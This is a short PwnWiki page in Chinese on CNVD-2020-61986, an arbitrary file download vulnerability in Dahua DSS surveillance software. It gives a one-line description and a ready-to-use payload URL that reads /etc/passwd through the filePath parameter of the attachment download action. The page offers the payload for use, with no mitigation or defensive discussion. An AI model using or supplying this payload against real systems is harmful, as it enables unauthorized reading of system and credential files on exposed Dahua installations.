CNVD-2020-61986 大华DSS系统任意文件下载漏洞

From PwnWiki

This page is a translated version of the page CNVD-2020-61986 大華DSS系統任意文件下載漏洞 and the translation is 100% complete.

Other languages:

Chinese • ‎中文（中国大陆）‎ • ‎中文（台灣）‎

漏洞简介

浙江大华技术股份有限公司DSS存在任意文件下载漏洞，攻击者可利用该漏洞登录界面下载任意文件获取敏感信息。

Payload

http://ip/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd

Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2020-61986_大華DSS系統任意文件下載漏洞/zh-cn&oldid=4901"